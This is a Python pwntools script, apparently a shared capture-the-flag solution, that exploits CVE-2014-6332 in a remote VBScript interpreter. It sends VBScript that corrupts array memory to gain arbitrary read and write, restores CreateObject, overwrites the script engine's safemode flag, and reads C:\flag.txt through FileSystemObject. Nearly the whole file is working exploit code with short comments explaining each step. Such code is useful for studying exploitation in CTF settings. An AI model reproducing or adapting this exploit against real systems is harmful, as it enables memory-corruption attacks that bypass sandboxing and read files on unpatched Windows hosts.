#!/usr/bin/env python | |
from pwn import * # pip install pwntools | |
# Ref: https://swehack.org/viewtopic.php?f=18&t=216 | |
# CVE-2014-6332 | |
# | |
# 1. Follow the steps above | |
# 2. Get CreateObject() by corrupt the symbol string | |
# 3. Turn off safemode | |
# 4. Create Scripting.FileSystemObject and read C:\flag.txt | |
r = remote('202.112.26.109', 12345) | |
def g(x): | |
y = [] | |
for i in x.split('\n'): | |
if i.strip(): | |
y.append(i.strip()) | |
x = ':'.join(y) | |
r.recvuntil('>>>') | |
print x | |
r.send(x+'\n') | |
g(''' | |
dim aa() | |
dim ab() | |
dim a0 | |
dim a1 | |
dim a2 | |
dim a3 | |
dim win9x | |
dim intVersion | |
dim rnda | |
dim funclass | |
dim myarray | |
Randomize() | |
redim aa(5) | |
redim ab(5) | |
a0=13+17*rnd(6) | |
a3=7+3*rnd(5) | |
''') | |
g(''' | |
function Over() | |
On Error Resume Next | |
dim type1,type2,type3 | |
Over=False | |
a0=a0+a3 | |
a1=a0+2 | |
a2=a0+&h8000000 | |
redim Preserve aa(a0) | |
redim ab(a0) | |
redim Preserve aa(a2) | |
type1=1 | |
ab(0)=1.123456789012345678901234567890 | |
aa(a0)=10 | |
If(IsObject(aa(a1-1)) = False) Then | |
if(vartype(aa(a1-1))<>0) Then | |
If(IsObject(aa(a1)) = False ) Then | |
type1=VarType(aa(a1)) | |
end if | |
end if | |
end if | |
If(type1=&h2f66) Then | |
Over=True | |
End If | |
redim Preserve aa(a0) | |
end function | |
''') | |
g(''' | |
For i = 0 To 400 | |
If Over()=True Then | |
Exit For | |
End If | |
Next | |
''') | |
g(''' | |
myarray=chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) | |
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) | |
''') | |
g(''' | |
sub testaa() | |
end sub | |
''') | |
g(''' | |
function mydata() | |
On Error Resume Next | |
i=testaa | |
i=null | |
redim Preserve aa(a2) | |
ab(0)=0 | |
aa(a1)=i | |
ab(0)=6.36598737437801E-314 | |
aa(a1+2)=myarray | |
ab(2)=1.74088534731324E-310 | |
mydata=aa(a1) | |
redim Preserve aa(a0) | |
end function | |
''') | |
g(''' | |
function rm(add) | |
On Error Resume Next | |
redim Preserve aa(a2) | |
ab(0)=0 | |
aa(a1)=add+4 | |
ab(0)=1.69759663316747E-313 | |
rm=lenb(aa(a1)) | |
ab(0)=0 | |
redim Preserve aa(a0) | |
end function | |
''') | |
g('Print mydata()') | |
addr = int(r.recvuntil('\r\n')) | |
print 'addr =', hex(addr) | |
g(''' | |
function wm(addx) | |
On Error Resume Next | |
redim Preserve aa(a2) | |
aa(a1+2)(addx)=ab(4) | |
redim Preserve aa(a0) | |
end function | |
''') | |
# Get default CreateObject() back by destroy the symbol string | |
# addr-1167*4: C.r.e.a.t.e.O.b.j.e.c.t | |
g('wm(%d)' % (addr - 1167*4 - 4)) | |
# Turn off the safemode | |
# int __thiscall COleScript::InSafeMode(COleScript *__hidden this) | |
# test byte ptr [ecx+174h], 0Bh | |
# push 0 | |
# pop eax | |
# setnz al | |
# retn | |
g('wm(rm(rm(%d)+16)+&h174)' % (addr+8)) | |
# Read flag | |
g('Set fso = CreateObject("Scripting.FileSystemObject")') | |
g('Set f = fso.OpenTextFile("C:\\flag.txt")') | |
g('Print f.ReadLine') | |
print r.recvuntil('}') | |
r.close() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment